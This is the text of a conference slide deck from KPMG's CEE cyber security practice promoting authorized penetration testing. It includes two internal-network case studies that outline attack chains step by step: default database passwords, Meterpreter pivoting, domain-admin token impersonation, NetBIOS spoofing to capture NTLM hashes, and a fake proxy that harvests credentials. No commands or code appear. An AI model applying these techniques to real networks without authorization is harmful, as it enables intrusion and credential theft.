Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE Cyber Security Services Security Testing - a requirement for a secure business ISACA DAY in SOFIA
Agenda No Agenda Some minimum theory More real life examples 1
Keywords Ethical Hacking Penetration Testing Pentesting Red Teaming Vulnerability Assessment OTHERs, as defined by you 2
Why this talk? Raise the awareness regarding security risks upon our data o Most businesses today are based on IT systems o Critical data is stored on IT systems o What would happen to my business if this data is stolen/lost? 3
What are the challenges when trying to protect our data? Question Jeweler store IT-based business Which are my valuable assets? Jewels Data (client data, intellectual property, payment information, etc) Where are my assets? On the shelf - My servers vs. Cloud - In transit - In backup copies - In DR center -?? How do I protect them from being stolen? Mechanisms to prevent the thief to leave with the jewels Prevent unauthorized access Encrypt Detect data misuse Prevent exfiltration What do I do in case of theft? Call the Police Call the Police? Report to CERT? Private investigation? 4
How do I know if my data is secure? Wait for an attack to happen Test proactively simulate an attack Is my data safe? 5
How to simulate an attack? Penetration Testing (a.k.a. Pentesting, Ethical Hacking, Red Teaming) Method for evaluating the security of an information system or network by simulating attacks from malicious outsiders or insiders Tools find this Exploit vulnerabilities and dig much deeper Penetration Testing is: Authorized Adversary based Ethical (for defensive purposes) Penetration Testing is not Vulnerability Assessment / Scanning Manual tests find this 6
What is? Vulnerability Assessment A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system Penetration Testing A penetration test is a method of evaluating the computer security of a computer system or network by simulating an attack from malicious outsiders and malicious insiders Definitions by Wikipedia 7
Vulnerability Assessment 8
Vulnerability Assessment Automated tool that finds vulnerabilities in the running application by interacting with it Web application scanners General vulnerability scanners (OS, databases, services, network) Send requests and compare the response against a database of signatures False positives, false negatives Must be fine tuned to produce good results 9
Example: Vulnerability Assessment 10
Penetration Testing 11
Penetration Testing Related terms: Penetration testing Pentesting Ethical hacking Tiger Teaming Red Teaming Penetration testing is: authorized adversary-based ethical (for defensive purposes) (BG: ръководители на проникване) 12
Penetration testing objectives (examples) External penetration test: Evaluate the security of internet facing web applications Test the security of internet banking / mobile banking app Find vulnerabilities in network perimeter systems Access personal data in online medical applications Internal penetration test: Obtain access to database server containing client information Gain domain administrator rights Obtain administrative access to ERP application Gain access to company assets (sensitive files, project plans, intellectual property) 13
Penetration Testing - By example Threats Vulnerabilities Assets Risks Vulnerable? Exploitable? External attacker - hacker - industrial espionage - organized crime Internal attacker - malicious employee - collaborator - consultant - visitor Insufficient input validation Insecure session configuration Application logic flaws Insecure server configuration Internet Banking application SQL injection OS command execution Authentication bypass Cross Site Scripting Directory browsing H H H M M Password autocomplete L 14
Real Life Examples 15
Internet Banking Application 16
Online Store Application 17
Online Store Application cont. 18
Online Store Application cont. 19
Website hacked before our pentest 20
Arbitrary file download 21
Social Engineering Test 22
Internal Penetration Test Scenario 23
Gaining root access 24
More examples One of the ATMs hacked by our team during an internal penetration test Hardware device created by our team to demonstrate the risk of rounding vulnerabilities in internet banking applications VoIP phone hacked during an internal penetration test 25
Some 0 day examples EMC Documentum D2 Multiple DQL Injection Vulnerabilities EMC Identifier: ESA-2015-108 CVE Identifier: CVE-2015-0547, CVE-2015-0548 Credits: EMC would like to thank Ionut Popescu, Security Consultant at KPMG Romania, for reporting CVE-2015-0547 and Ionut Ambrosie, Security Consultant at KPMG Romania, for reporting CVE-2015-0548. EMC Documentum D2 Cross-Site Scripting Vulnerability EMC Identifier: ESA-2015-109 CVE Identifier: CVE-2015-0549 Credits: EMC would like to thank Ionut Ambrosie, Security Consultant at KPMG Romania, for reporting this issue. ESA-2015-123: EMC Documentum WebTop Open Redirect Vulnerability ESA Identifier: ESA-2015-123 CVE Identifier: CVE-2015-4529 Credits: EMC would like to thank Daniel Tomescu, Security Penetration Tester at KPMG Romania, for reporting this issue. 26
Penetration testing types According to attacker s location: Test type External pentest Internal pentest Simulated threats Hackers, corporate espionage, terrorists, organized crime Malicious employee, collaborator, consultant, visitor According to attacker s initial information: Black box test Gray box test White box test Hackers, organized crime, terrorists, visitors Consultants, corporate espionage, business partner, regular employees Malicious system administrators, developers, consultants According to the attacks performed: - pure technical - social engineering - denial of service 27
How? (example graf) Information gathering Create attack trees Prepare tools Perform collaborative attacks Identify vulnerabilities Exploit vulnerabilities Extract sensitive data Gain system access Escalate privileges Pivot to other systems Write the report 28
Automated vs. Manual Automated testing: Configure scanner Run scanner & wait for results (Validate findings where possible) Deliver report to client Manual testing: Use tools as helpers only Validate findings by exploitation (no false positives) Dig for sensitive data, escalate privileges, gain access to other systems Model and simulate real threats: simulate attacker s way of thinking, consider attacker s resources, knowledge, culture, motivation Several manual tests for exploitation of specific vulnerabilities Strict control, logging, quick feedback Interpret the findings according to business impact 29
Pen test Resources Dedicated machines Dedicated network Software tools: In-house developed Open source Commercial Dedicated workspace (IT Security Laboratory) Protect client data Logging facility 30
Pen Test Limitations Timeframe Budget Resources Personnel awareness Things change Does not discover all vulnerabilities but reduces the number of vulnerabilities that could be found by high skilled attackers having similar resources and knowledge All software vulnerabilities Known Vulnerabilities 31
Reporting Executive summary Overview Key findings High-level observations Risk matrix Technical report Findings Risks Recommendations Present report to client 32
Conclusions Security is a continuous process New vulnerabilities / weaknesses appear every day Everyone in the organization is responsible There is no bullet proof solution Defense in depth works best Be proactive rather than reactive 33
Case Study 1 34
Pentesting the internal network (2011) Objective: See what an internal malicious user could do, given simple network physical access. Malicious user: visitor, contractor, malicious employee Targets: confidential data, client information, strategic business plans, etc Initial access: physical network port in users subnet 35
Pentesting the internal network (2011) cont. 36
Pentesting the internal network (2011) cont. 1. Network mapping IP ranges Host names 37
Pentesting the internal network (2011) cont. 1. Network mapping IP ranges Host names 2. Service and OS discovery Windows 7 Windows 2008 Server R2 Common client ports open IIS, MsSQL, Exchange, etc 38
Pentesting the internal network (2011) cont. 1. Network mapping IP ranges Host names 2. Service and OS discovery Windows 7 Windows 2008 Server R2 Common client ports open IIS, MsSQL, Exchange, etc 3. Vulnerability scanning Nessus: 1 high, 30 medium, 39 low MsSQL server default password for sa user 39
Pentesting the internal network (2011) cont. 4. Exploitation 40
Pentesting the internal network (2011) cont. 4. Exploitation Add local admin 41
Pentesting the internal network (2011) cont. 4. Exploitation Add local admin 5. Post-exploitation Info gathering Credentials to other systems 42
Pentesting the internal network (2011) cont. 4. Exploitation Add local admin 5. Post-exploitation Info gathering Credentials to other systems 6. Pivoting Connect to 2 nd db server Upload Meterpreter 43
Pentesting the internal network (2011) cont. 4. Exploitation Add local admin 5. Post-exploitation Info gathering Credentials to other systems 6. Pivoting Connect to 2 nd db server Upload Meterpreter 7. Post-exploitation List tokens Impersonate Domain Admin token Create Domain Admin user Game Over 44
Pentesting the internal network (2011) cont. Game over on Domain Controller: 45
Case Study 2 46
Pentesting the (same) internal network (2012) Objective: See what an internal malicious user could do, given simple network access. Test the findings from previous year Malicious user: Targets: Initial access: visitor, contractor, malicious employee confidential data, client information, strategic business plans, etc network port in users subnet 47
Pentesting the (same) internal network (2012) cont. 1. Network mapping ~ the same as last year 2. Service and OS discovery ~ the same as last year 48
Pentesting the (same) internal network (2012) cont. 1. Network mapping ~ the same as last year 2. Service and OS discovery ~ the same as last year 3. Vulnerability scanning Nessus: 0 high, 21 medium, 30 low 49
Pentesting the (same) internal network (2012) cont. 1. Network mapping ~ the same as last year 2. Service and OS discovery ~ the same as last year 3. Vulnerability scanning Nessus: 0 high, 21 medium, 30 low Now what? No default/weak passwords No missing patches No exploitable config problems No sql injection. 50
Pentesting the (same) internal network (2012) cont. 4. Attack the clients method 1 51
Pentesting the (same) internal network (2012) cont. 4. Attack the clients method 1 Setup a fake local NetBIOS server Respond to every request with my IP address Setup multiple local services (HTTP, SMB) Request Windows authentication on connection => capture password hashes 52
Pentesting the (same) internal network (2012) cont. 4. Attack the clients method 1 cont. Captured around NTLM 50 hashes Cracked about 25% using dictionary attack with mangling rules in a few hours Gained network access as domain user (low privileges) Could access some shared files on file server Not enough 53
Pentesting the (same) internal network (2012) cont. 4. Attack the clients method 2 Man in the middle attack between victim and proxy server Setup a fake local proxy server Request Basic authentication Receive user s credentials in clear text (base64 encoded) 54
Pentesting the (same) internal network (2012) cont. 4. Attack the clients method 2 cont The victim sees this: What would you do? 55
Pentesting the (same) internal network (2012) cont. 5. Exploitation Got local admin password (global) from a special user Could connect as admin on any workstation 56
Pentesting the (same) internal network (2012) cont. 5. Exploitation Got local admin password (global) Could connect as admin on any workstation 6. Pivoting Search the machines from IT subnet for interesting credentials / tokens Found a process running as a domain admin user 57
Pentesting the (same) internal network (2012) cont. 5. Exploitation Got local admin password (global) Could connect as admin on any workstation 6. Pivoting Search the machines from IT subnet for interesting credentials / tokens Found a process running as a domain admin user 7. Exploitation Impersonate domain admin Create new domain admin user Game over 58
Lessons learned 59
Pentest comparison 2011 2012 Low hanging fruits removed no yes IT personnel vigilance low high Network prepared for pentest no yes Existing vulnerabilities yes yes (lower nr) Overall exploitation difficulty medium high 60
Consultant s advice Make yourself periodic vulnerability assessments (e.g. Nessus scans) Prepare your network before a pentest (you should always be prepared, btw) An homogeneous network is easier to defend then an heterogeneous one Do not allow local admin rights for regular users Patch, patch, patch Educate users for security risks 61
Overall Conclusions Penetration testing can be used for improving our cyber security Do it periodically with specialized people Mandatory for new applications / systems before putting in production Vulnerability assessment is not penetration testing 62
Being proactive Penetration testing can be used for improving our cyber security Do it periodically with specialized people Mandatory for new applications / systems before putting in production Vulnerability scanning is not penetration testing 63
Our clients recommend us We tested the security of high profile Romanian and international companies; the feedback received encourages us to continue our high quality work as part of KPMG NL team as part of KPMG HU team as part of KPMG NL team CEE and many more... 64
Gabriel Mihai Tanase, Advisory Director KPMG in CEE, CyberSecurity Services mtanase@kpmg.com Nikola Nyagolov, Advisory Director KPMG in Bulgaria nnyagolov@kpmg.com Thank you!